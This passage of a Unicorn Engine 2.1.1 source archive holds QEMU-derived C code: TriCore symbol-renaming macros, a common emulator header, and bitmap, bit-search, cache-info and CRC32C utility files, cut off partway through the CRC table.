helper_gvec_ne64_tricore #define helper_gvec_lt64 helper_gvec_lt64_tricore #define helper_gvec_le64 helper_gvec_le64_tricore #define helper_gvec_ltu64 helper_gvec_ltu64_tricore #define helper_gvec_leu64 helper_gvec_leu64_tricore #define helper_gvec_ssadd8 helper_gvec_ssadd8_tricore #define helper_gvec_ssadd16 helper_gvec_ssadd16_tricore #define helper_gvec_ssadd32 helper_gvec_ssadd32_tricore #define helper_gvec_ssadd64 helper_gvec_ssadd64_tricore #define helper_gvec_sssub8 helper_gvec_sssub8_tricore #define helper_gvec_sssub16 helper_gvec_sssub16_tricore #define helper_gvec_sssub32 helper_gvec_sssub32_tricore #define helper_gvec_sssub64 helper_gvec_sssub64_tricore #define helper_gvec_usadd8 helper_gvec_usadd8_tricore #define helper_gvec_usadd16 helper_gvec_usadd16_tricore #define helper_gvec_usadd32 helper_gvec_usadd32_tricore #define helper_gvec_usadd64 helper_gvec_usadd64_tricore #define helper_gvec_ussub8 helper_gvec_ussub8_tricore #define helper_gvec_ussub16 helper_gvec_ussub16_tricore #define helper_gvec_ussub32 helper_gvec_ussub32_tricore #define helper_gvec_ussub64 helper_gvec_ussub64_tricore #define helper_gvec_smin8 helper_gvec_smin8_tricore #define helper_gvec_smin16 helper_gvec_smin16_tricore #define helper_gvec_smin32 helper_gvec_smin32_tricore #define helper_gvec_smin64 helper_gvec_smin64_tricore #define helper_gvec_smax8 helper_gvec_smax8_tricore #define helper_gvec_smax16 helper_gvec_smax16_tricore #define helper_gvec_smax32 helper_gvec_smax32_tricore #define helper_gvec_smax64 helper_gvec_smax64_tricore #define helper_gvec_umin8 helper_gvec_umin8_tricore #define helper_gvec_umin16 helper_gvec_umin16_tricore #define helper_gvec_umin32 helper_gvec_umin32_tricore #define helper_gvec_umin64 helper_gvec_umin64_tricore #define helper_gvec_umax8 helper_gvec_umax8_tricore #define helper_gvec_umax16 helper_gvec_umax16_tricore #define helper_gvec_umax32 helper_gvec_umax32_tricore #define helper_gvec_umax64 helper_gvec_umax64_tricore #define helper_gvec_bitsel helper_gvec_bitsel_tricore #define cpu_restore_state cpu_restore_state_tricore #define page_collection_lock page_collection_lock_tricore #define page_collection_unlock page_collection_unlock_tricore #define free_code_gen_buffer free_code_gen_buffer_tricore #define tcg_exec_init tcg_exec_init_tricore #define tb_cleanup tb_cleanup_tricore #define tb_flush tb_flush_tricore #define tb_phys_invalidate tb_phys_invalidate_tricore #define tb_gen_code tb_gen_code_tricore #define tb_exec_lock tb_exec_lock_tricore #define tb_exec_unlock tb_exec_unlock_tricore #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_tricore #define tb_invalidate_phys_range tb_invalidate_phys_range_tricore #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_tricore #define tb_check_watchpoint tb_check_watchpoint_tricore #define cpu_io_recompile cpu_io_recompile_tricore #define tb_flush_jmp_cache tb_flush_jmp_cache_tricore #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_tricore #define translator_loop_temp_check translator_loop_temp_check_tricore #define translator_loop translator_loop_tricore #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_tricore #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_tricore #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_tricore #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_tricore #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_tricore #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_tricore #define unassigned_mem_ops unassigned_mem_ops_tricore #define floatx80_infinity floatx80_infinity_tricore #define dup_const_func dup_const_func_tricore #define gen_helper_raise_exception gen_helper_raise_exception_tricore #define gen_helper_raise_interrupt gen_helper_raise_interrupt_tricore #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_tricore #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_tricore #define gen_helper_cpsr_read gen_helper_cpsr_read_tricore #define gen_helper_cpsr_write gen_helper_cpsr_write_tricore #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_tricore #define helper_fadd helper_fadd_tricore #define helper_fsub helper_fsub_tricore #define helper_fmul helper_fmul_tricore #define helper_fdiv helper_fdiv_tricore #define helper_fmadd helper_fmadd_tricore #define helper_fmsub helper_fmsub_tricore #define helper_pack helper_pack_tricore #define gen_intermediate_code gen_intermediate_code_tricore #define restore_state_to_opc restore_state_to_opc_tricore #define helper_uc_tricore_exit helper_uc_tricore_exit_tricore #endif ��������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/unicorn_common.h�����������������������������������������������������������������0000664�0000000�0000000�00000011645�14675241067�0017360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UNICORN_COMMON_H #define UNICORN_COMMON_H #include "tcg/tcg.h" #include "qemu-common.h" #include "exec/memory.h" // This header define common patterns/codes that will be included in all arch-sepcific // codes for unicorns purposes. void vm_start(struct uc_struct*); void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size); bool unicorn_fill_tlb(CPUState *cs, vaddr address, int size, MMUAccessType rw, int mmu_idx, bool probe, uintptr_t retaddr); // return true on success, false on failure static inline bool cpu_physical_mem_read(AddressSpace *as, hwaddr addr, uint8_t *buf, int len) { return cpu_physical_memory_rw(as, addr, (void *)buf, len, 0); } static inline bool cpu_physical_mem_write(AddressSpace *as, hwaddr addr, const uint8_t *buf, int len) { return cpu_physical_memory_rw(as, addr, (void *)buf, len, 1); } void tb_cleanup(struct uc_struct *uc); void free_code_gen_buffer(struct uc_struct *uc); /** Freeing common resources */ static void release_common(void *t) { TCGPool *po, *to; TCGContext *s = (TCGContext *)t; #if TCG_TARGET_REG_BITS == 32 int i; #endif // Clean TCG. TCGOpDef* def = s->tcg_op_defs; g_free(def->args_ct); g_free(def->sorted_args); g_free(s->tcg_op_defs); for (po = s->pool_first; po; po = to) { to = po->next; g_free(po); } tcg_pool_reset(s); g_hash_table_destroy(s->helper_table); g_hash_table_destroy(s->custom_helper_infos); g_free(s->indirect_reg_alloc_order); /* qemu/tcg/tcg/c:4018: img = g_malloc(img_size); */ g_free((void *)(s->one_entry->symfile_addr)); g_free(s->one_entry); /* qemu/tcg/tcg/c:574: tcg_ctx->tree = g_tree_new(tb_tc_cmp); */ g_tree_destroy(s->tree); // these function is not available outside qemu // so we keep them here instead of outside uc_close. memory_free(s->uc); address_space_destroy(&s->uc->address_space_memory); address_space_destroy(&s->uc->address_space_io); /* clean up uc->l1_map. */ tb_cleanup(s->uc); /* clean up tcg_ctx->code_gen_buffer. */ free_code_gen_buffer(s->uc); /* qemu/util/qht.c:264: map = qht_map_create(n_buckets); */ qht_destroy(&s->tb_ctx.htable); cpu_watchpoint_remove_all(CPU(s->uc->cpu), BP_CPU); cpu_breakpoint_remove_all(CPU(s->uc->cpu), BP_CPU); #if TCG_TARGET_REG_BITS == 32 for(i = 0; i < s->nb_globals; i++) { TCGTemp *ts = &s->temps[i]; if (ts->base_type == TCG_TYPE_I64) { if (ts->name && ((strcmp(ts->name+(strlen(ts->name)-2), "_0") == 0) || (strcmp(ts->name+(strlen(ts->name)-2), "_1") == 0))) { free((void *)ts->name); } } } #endif } static inline void target_page_init(struct uc_struct* uc) { uc->target_page_size = TARGET_PAGE_SIZE; uc->target_page_align = TARGET_PAGE_SIZE - 1; } static uc_err uc_set_tlb(struct uc_struct *uc, int mode) { switch (mode) { case UC_TLB_VIRTUAL: uc->cpu->cc->tlb_fill = unicorn_fill_tlb; return UC_ERR_OK; case UC_TLB_CPU: uc->cpu->cc->tlb_fill = uc->cpu->cc->tlb_fill_cpu; return UC_ERR_OK; default: return UC_ERR_ARG; } } MemoryRegion *find_memory_mapping(struct uc_struct *uc, hwaddr address) { hwaddr xlat = 0; hwaddr len = 1; MemoryRegion *mr = address_space_translate(&uc->address_space_memory, address, &xlat, &len, false, MEMTXATTRS_UNSPECIFIED); if (mr == &uc->io_mem_unassigned) { return NULL; } return mr; } void softfloat_init(void); static inline void uc_common_init(struct uc_struct* uc) { uc->write_mem = cpu_physical_mem_write; uc->read_mem = cpu_physical_mem_read; uc->tcg_exec_init = tcg_exec_init; uc->cpu_exec_init_all = cpu_exec_init_all; uc->vm_start = vm_start; uc->memory_map = memory_map; uc->memory_map_ptr = memory_map_ptr; uc->memory_unmap = memory_unmap; uc->memory_moveout = memory_moveout; uc->memory_movein = memory_movein; uc->readonly_mem = memory_region_set_readonly; uc->target_page = target_page_init; uc->softfloat_initialize = softfloat_init; uc->tcg_flush_tlb = tcg_flush_softmmu_tlb; uc->memory_map_io = memory_map_io; uc->set_tlb = uc_set_tlb; uc->memory_mapping = find_memory_mapping; uc->memory_filter_subregions = memory_region_filter_subregions; uc->memory_cow = memory_cow; if (!uc->release) uc->release = release_common; } #define CHECK_REG_TYPE(type) do { \ if (unlikely(*size < sizeof(type))) { \ return UC_ERR_OVERFLOW; \ } \ *size = sizeof(type); \ ret = UC_ERR_OK; \ } while(0) #endif �������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/����������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015130�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/bitmap.c��������������������������������������������������������������������0000664�0000000�0000000�00000031037�14675241067�0016554�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Bitmap Module * * Stolen from linux/src/lib/bitmap.c * * Copyright (C) 2010 Corentin Chary * * This source code is licensed under the GNU General Public License, * Version 2. */ #include "qemu/osdep.h" #include "qemu/bitops.h" #include "qemu/bitmap.h" #include "qemu/atomic.h" /* * bitmaps provide an array of bits, implemented using an * array of unsigned longs. The number of valid bits in a * given bitmap does _not_ need to be an exact multiple of * BITS_PER_LONG. * * The possible unused bits in the last, partially used word * of a bitmap are 'don't care'. The implementation makes * no particular effort to keep them zero. It ensures that * their value will not affect the results of any operation. * The bitmap operations that return Boolean (bitmap_empty, * for example) or scalar (bitmap_weight, for example) results * carefully filter out these unused bits from impacting their * results. * * These operations actually hold to a slightly stronger rule: * if you don't input any bitmaps to these ops that have some * unused bits set, then they won't output any set unused bits * in output bitmaps. * * The byte ordering of bitmaps is more natural on little * endian architectures. */ int slow_bitmap_empty(const unsigned long *bitmap, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap[k]) { return 0; } } if (bits % BITS_PER_LONG) { if (bitmap[k] & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } int slow_bitmap_full(const unsigned long *bitmap, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (~bitmap[k]) { return 0; } } if (bits % BITS_PER_LONG) { if (~bitmap[k] & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } int slow_bitmap_equal(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap1[k] != bitmap2[k]) { return 0; } } if (bits % BITS_PER_LONG) { if ((bitmap1[k] ^ bitmap2[k]) & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } void slow_bitmap_complement(unsigned long *dst, const unsigned long *src, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { dst[k] = ~src[k]; } if (bits % BITS_PER_LONG) { dst[k] = ~src[k] & BITMAP_LAST_WORD_MASK(bits); } } int slow_bitmap_and(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); unsigned long result = 0; for (k = 0; k < nr; k++) { result |= (dst[k] = bitmap1[k] & bitmap2[k]); } return result != 0; } void slow_bitmap_or(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); for (k = 0; k < nr; k++) { dst[k] = bitmap1[k] | bitmap2[k]; } } void slow_bitmap_xor(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); for (k = 0; k < nr; k++) { dst[k] = bitmap1[k] ^ bitmap2[k]; } } int slow_bitmap_andnot(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); unsigned long result = 0; for (k = 0; k < nr; k++) { result |= (dst[k] = bitmap1[k] & ~bitmap2[k]); } return result != 0; } void qemu_bitmap_set(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); while (nr - bits_to_set >= 0) { *p |= mask_to_set; nr -= bits_to_set; bits_to_set = BITS_PER_LONG; mask_to_set = ~0UL; p++; } if (nr) { mask_to_set &= BITMAP_LAST_WORD_MASK(size); *p |= mask_to_set; } } void bitmap_set_atomic(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); /* First word */ if (nr - bits_to_set > 0) { atomic_or(p, mask_to_set); nr -= bits_to_set; bits_to_set = BITS_PER_LONG; mask_to_set = ~0UL; p++; } /* Full words */ if (bits_to_set == BITS_PER_LONG) { while (nr >= BITS_PER_LONG) { *p = ~0UL; nr -= BITS_PER_LONG; p++; } } /* Last word */ if (nr) { mask_to_set &= BITMAP_LAST_WORD_MASK(size); atomic_or(p, mask_to_set); } else { /* If we avoided the full barrier in atomic_or(), issue a * barrier to account for the assignments in the while loop. */ smp_mb(); } } void qemu_bitmap_clear(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); while (nr - bits_to_clear >= 0) { *p &= ~mask_to_clear; nr -= bits_to_clear; bits_to_clear = BITS_PER_LONG; mask_to_clear = ~0UL; p++; } if (nr) { mask_to_clear &= BITMAP_LAST_WORD_MASK(size); *p &= ~mask_to_clear; } } bool bitmap_test_and_clear_atomic(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); unsigned long dirty = 0; unsigned long old_bits; assert(start >= 0 && nr >= 0); /* First word */ if (nr - bits_to_clear > 0) { old_bits = atomic_fetch_and(p, ~mask_to_clear); dirty |= old_bits & mask_to_clear; nr -= bits_to_clear; bits_to_clear = BITS_PER_LONG; mask_to_clear = ~0UL; p++; } /* Full words */ if (bits_to_clear == BITS_PER_LONG) { while (nr >= BITS_PER_LONG) { if (*p) { old_bits = *p; *p = 0; dirty |= old_bits; } nr -= BITS_PER_LONG; p++; } } /* Last word */ if (nr) { mask_to_clear &= BITMAP_LAST_WORD_MASK(size); old_bits = atomic_fetch_and(p, ~mask_to_clear); dirty |= old_bits & mask_to_clear; } else { if (!dirty) { smp_mb(); } } return dirty != 0; } void bitmap_copy_and_clear_atomic(unsigned long *dst, unsigned long *src, long nr) { while (nr > 0) { *dst = *src; *src = 0; dst++; src++; nr -= BITS_PER_LONG; } } #define ALIGN_MASK(x,mask) (((x)+(mask))&~(mask)) /** * bitmap_find_next_zero_area - find a contiguous aligned zero area * @map: The address to base the search on * @size: The bitmap size in bits * @start: The bitnumber to start searching at * @nr: The number of zeroed bits we're looking for * @align_mask: Alignment mask for zero area * * The @align_mask should be one less than a power of 2; the effect is that * the bit offset of all zero areas this function finds is multiples of that * power of 2. A @align_mask of 0 means no alignment is required. */ unsigned long bitmap_find_next_zero_area(unsigned long *map, unsigned long size, unsigned long start, unsigned long nr, unsigned long align_mask) { unsigned long index, end, i; again: index = find_next_zero_bit(map, size, start); /* Align allocation */ index = ALIGN_MASK(index, align_mask); end = index + nr; if (end > size) { return end; } i = find_next_bit(map, end, index); if (i < end) { start = i + 1; goto again; } return index; } int slow_bitmap_intersects(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap1[k] & bitmap2[k]) { return 1; } } if (bits % BITS_PER_LONG) { if ((bitmap1[k] & bitmap2[k]) & BITMAP_LAST_WORD_MASK(bits)) { return 1; } } return 0; } long slow_bitmap_count_one(const unsigned long *bitmap, long nbits) { long k, lim = nbits / BITS_PER_LONG, result = 0; for (k = 0; k < lim; k++) { result += ctpopl(bitmap[k]); } if (nbits % BITS_PER_LONG) { result += ctpopl(bitmap[k] & BITMAP_LAST_WORD_MASK(nbits)); } return result; } static void bitmap_to_from_le(unsigned long *dst, const unsigned long *src, long nbits) { long len = BITS_TO_LONGS(nbits); #ifdef HOST_WORDS_BIGENDIAN long index; for (index = 0; index < len; index++) { # if HOST_LONG_BITS == 64 dst[index] = bswap64(src[index]); # else dst[index] = bswap32(src[index]); # endif } #else memcpy(dst, src, len * sizeof(unsigned long)); #endif } void bitmap_from_le(unsigned long *dst, const unsigned long *src, long nbits) { bitmap_to_from_le(dst, src, nbits); } void bitmap_to_le(unsigned long *dst, const unsigned long *src, long nbits) { bitmap_to_from_le(dst, src, nbits); } /* * Copy "src" bitmap with a positive offset and put it into the "dst" * bitmap. The caller needs to make sure the bitmap size of "src" * is bigger than (shift + nbits). */ void bitmap_copy_with_src_offset(unsigned long *dst, const unsigned long *src, unsigned long shift, unsigned long nbits) { unsigned long left_mask, right_mask, last_mask; /* Proper shift src pointer to the first word to copy from */ src += BIT_WORD(shift); shift %= BITS_PER_LONG; if (!shift) { /* Fast path */ bitmap_copy(dst, src, nbits); return; } right_mask = (1ul << shift) - 1; left_mask = ~right_mask; while (nbits >= BITS_PER_LONG) { *dst = (*src & left_mask) >> shift; *dst |= (src[1] & right_mask) << (BITS_PER_LONG - shift); dst++; src++; nbits -= BITS_PER_LONG; } if (nbits > BITS_PER_LONG - shift) { *dst = (*src & left_mask) >> shift; nbits -= BITS_PER_LONG - shift; last_mask = (1ul << nbits) - 1; *dst |= (src[1] & last_mask) << (BITS_PER_LONG - shift); } else if (nbits) { last_mask = (1ul << nbits) - 1; *dst = (*src >> shift) & last_mask; } } /* * Copy "src" bitmap into the "dst" bitmap with an offset in the * "dst". The caller needs to make sure the bitmap size of "dst" is * bigger than (shift + nbits). */ void bitmap_copy_with_dst_offset(unsigned long *dst, const unsigned long *src, unsigned long shift, unsigned long nbits) { unsigned long left_mask, right_mask, last_mask; /* Proper shift dst pointer to the first word to copy from */ dst += BIT_WORD(shift); shift %= BITS_PER_LONG; if (!shift) { /* Fast path */ bitmap_copy(dst, src, nbits); return; } right_mask = (1ul << (BITS_PER_LONG - shift)) - 1; left_mask = ~right_mask; *dst &= (1ul << shift) - 1; while (nbits >= BITS_PER_LONG) { *dst |= (*src & right_mask) << shift; dst[1] = (*src & left_mask) >> (BITS_PER_LONG - shift); dst++; src++; nbits -= BITS_PER_LONG; } if (nbits > BITS_PER_LONG - shift) { *dst |= (*src & right_mask) << shift; nbits -= BITS_PER_LONG - shift; last_mask = ((1ul << nbits) - 1) << (BITS_PER_LONG - shift); dst[1] = (*src & last_mask) >> (BITS_PER_LONG - shift); } else if (nbits) { last_mask = (1ul << nbits) - 1; *dst |= (*src & last_mask) << shift; } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/bitops.c��������������������������������������������������������������������0000664�0000000�0000000�00000007521�14675241067�0016601�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2004 Red Hat, Inc. All Rights Reserved. * Written by David Howells (dhowells@redhat.com) * Copyright (C) 2008 IBM Corporation * Written by Rusty Russell <rusty@rustcorp.com.au> * (Inspired by David Howell's find_next_bit implementation) * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version * 2 of the License, or (at your option) any later version. */ #include "qemu/osdep.h" #include "qemu/bitops.h" /* * Find the next set bit in a memory region. */ unsigned long find_next_bit(const unsigned long *addr, unsigned long size, unsigned long offset) { const unsigned long *p = addr + BIT_WORD(offset); unsigned long result = offset & ~(BITS_PER_LONG-1); unsigned long tmp; if (offset >= size) { return size; } size -= result; offset %= BITS_PER_LONG; if (offset) { tmp = *(p++); tmp &= (~0UL << offset); if (size < BITS_PER_LONG) { goto found_first; } if (tmp) { goto found_middle; } size -= BITS_PER_LONG; result += BITS_PER_LONG; } while (size >= 4*BITS_PER_LONG) { unsigned long d1, d2, d3; tmp = *p; d1 = *(p+1); d2 = *(p+2); d3 = *(p+3); if (tmp) { goto found_middle; } if (d1 | d2 | d3) { break; } p += 4; result += 4*BITS_PER_LONG; size -= 4*BITS_PER_LONG; } while (size >= BITS_PER_LONG) { if ((tmp = *(p++))) { goto found_middle; } result += BITS_PER_LONG; size -= BITS_PER_LONG; } if (!size) { return result; } tmp = *p; found_first: tmp &= (~0UL >> (BITS_PER_LONG - size)); if (tmp == 0UL) { /* Are any bits set? */ return result + size; /* Nope. */ } found_middle: return result + ctzl(tmp); } /* * This implementation of find_{first,next}_zero_bit was stolen from * Linus' asm-alpha/bitops.h. */ unsigned long find_next_zero_bit(const unsigned long *addr, unsigned long size, unsigned long offset) { const unsigned long *p = addr + BIT_WORD(offset); unsigned long result = offset & ~(BITS_PER_LONG-1); unsigned long tmp; if (offset >= size) { return size; } size -= result; offset %= BITS_PER_LONG; if (offset) { tmp = *(p++); tmp |= ~0UL >> (BITS_PER_LONG - offset); if (size < BITS_PER_LONG) { goto found_first; } if (~tmp) { goto found_middle; } size -= BITS_PER_LONG; result += BITS_PER_LONG; } while (size & ~(BITS_PER_LONG-1)) { if (~(tmp = *(p++))) { goto found_middle; } result += BITS_PER_LONG; size -= BITS_PER_LONG; } if (!size) { return result; } tmp = *p; found_first: tmp |= ~0UL << size; if (tmp == ~0UL) { /* Are any bits zero? */ return result + size; /* Nope. */ } found_middle: return result + ctzl(~tmp); } unsigned long find_last_bit(const unsigned long *addr, unsigned long size) { unsigned long words; unsigned long tmp; /* Start at final word. */ words = size / BITS_PER_LONG; /* Partial final word? */ if (size & (BITS_PER_LONG-1)) { tmp = (addr[words] & (~0UL >> (BITS_PER_LONG - (size & (BITS_PER_LONG-1))))); if (tmp) { goto found; } } while (words) { tmp = addr[--words]; if (tmp) { found: return words * BITS_PER_LONG + BITS_PER_LONG - 1 - clzl(tmp); } } /* Not found */ return size; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/cacheinfo.c�����������������������������������������������������������������0000664�0000000�0000000�00000011520�14675241067�0017212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * cacheinfo.c - helpers to query the host about its caches * * Copyright (C) 2017, Emilio G. Cota <cota@braap.org> * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "qemu/atomic.h" #include <uc_priv.h> /* * Operating system specific detection mechanisms. */ #if defined(_WIN32) static void sys_cache_info(int *isize, int *dsize) { SYSTEM_LOGICAL_PROCESSOR_INFORMATION *buf; DWORD size = 0; BOOL success; size_t i, n; /* Check for the required buffer size first. Note that if the zero size we use for the probe results in success, then there is no data available; fail in that case. */ success = GetLogicalProcessorInformation(0, &size); if (success || GetLastError() != ERROR_INSUFFICIENT_BUFFER) { return; } n = size / sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); size = n * sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); buf = g_new0(SYSTEM_LOGICAL_PROCESSOR_INFORMATION, n); if (!GetLogicalProcessorInformation(buf, &size)) { goto fail; } for (i = 0; i < n; i++) { if (buf[i].Relationship == RelationCache && buf[i].Cache.Level == 1) { switch (buf[i].Cache.Type) { case CacheUnified: *isize = *dsize = buf[i].Cache.LineSize; break; case CacheInstruction: *isize = buf[i].Cache.LineSize; break; case CacheData: *dsize = buf[i].Cache.LineSize; break; default: break; } } } fail: g_free(buf); } #elif defined(__APPLE__) # include <sys/sysctl.h> static void sys_cache_info(int *isize, int *dsize) { /* There's only a single sysctl for both I/D cache line sizes. */ long size; size_t len = sizeof(size); if (!sysctlbyname("hw.cachelinesize", &size, &len, NULL, 0)) { *isize = *dsize = size; } } #elif defined(__FreeBSD__) || defined(__FreeBSD_kernel__) # include <sys/sysctl.h> static void sys_cache_info(int *isize, int *dsize) { /* There's only a single sysctl for both I/D cache line sizes. */ int size; size_t len = sizeof(size); if (!sysctlbyname("machdep.cacheline_size", &size, &len, NULL, 0)) { *isize = *dsize = size; } } #else /* POSIX */ static void sys_cache_info(int *isize, int *dsize) { # ifdef _SC_LEVEL1_ICACHE_LINESIZE int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE); if (tmp_isize > 0) { *isize = tmp_isize; } # endif # ifdef _SC_LEVEL1_DCACHE_LINESIZE int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE); if (tmp_dsize > 0) { *dsize = tmp_dsize; } # endif } #endif /* sys_cache_info */ /* * Architecture (+ OS) specific detection mechanisms. */ #if defined(__aarch64__) static void arch_cache_info(int *isize, int *dsize) { if (*isize == 0 || *dsize == 0) { uint64_t ctr; /* The real cache geometry is in CCSIDR_EL1/CLIDR_EL1/CSSELR_EL1, but (at least under Linux) these are marked protected by the kernel. However, CTR_EL0 contains the minimum linesize in the entire hierarchy, and is used by userspace cache flushing. */ asm volatile("mrs\t%0, ctr_el0" : "=r"(ctr)); if (*isize == 0) { *isize = 4 << (ctr & 0xf); } if (*dsize == 0) { *dsize = 4 << ((ctr >> 16) & 0xf); } } } #elif defined(_ARCH_PPC) && defined(__linux__) # include "elf.h" static void arch_cache_info(int *isize, int *dsize) { if (*isize == 0) { *isize = qemu_getauxval(AT_ICACHEBSIZE); } if (*dsize == 0) { *dsize = qemu_getauxval(AT_DCACHEBSIZE); } } #else static void arch_cache_info(int *isize, int *dsize) { } #endif /* arch_cache_info */ /* * ... and if all else fails ... */ static void fallback_cache_info(int *isize, int *dsize) { /* If we can only find one of the two, assume they're the same. */ if (*isize) { if (*dsize) { /* Success! */ } else { *dsize = *isize; } } else if (*dsize) { *isize = *dsize; } else { #if defined(_ARCH_PPC) /* For PPC, we're going to use the icache size computed for flush_icache_range. Which means that we must use the architecture minimum. */ *isize = *dsize = 16; #else /* Otherwise, 64 bytes is not uncommon. */ *isize = *dsize = 64; #endif } } void init_cache_info(struct uc_struct *uc) { int isize = 0, dsize = 0; sys_cache_info(&isize, &dsize); arch_cache_info(&isize, &dsize); fallback_cache_info(&isize, &dsize); assert((isize & (isize - 1)) == 0); assert((dsize & (dsize - 1)) == 0); uc->qemu_icache_linesize = isize; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/crc32c.c��������������������������������������������������������������������0000664�0000000�0000000�00000021233�14675241067�0016354�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Castagnoli CRC32C Checksum Algorithm * * Polynomial: 0x11EDC6F41 * * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman * "Optimization of Cyclic Redundancy-Check Codes with 24 * and 32 Parity Bits",IEEE Transactions on Communication, * Volume 41, Number 6, June 1993 * * Copyright (c) 2013 Red Hat, Inc., * * Authors: * Jeff Cody <jcody@redhat.com> * * Based on the Linux kernel cryptographic crc32c module, * * Copyright (c) 2004 Cisco Systems, Inc. * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. * */ #include "qemu/osdep.h" #include "qemu/crc32c.h" /* * This is the CRC-32C table * Generated with: * width = 32 bits * poly = 0x1EDC6F41 * reflect input bytes = true * reflect output bytes = true */ static const uint32_t crc32c_table[256] = { 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, 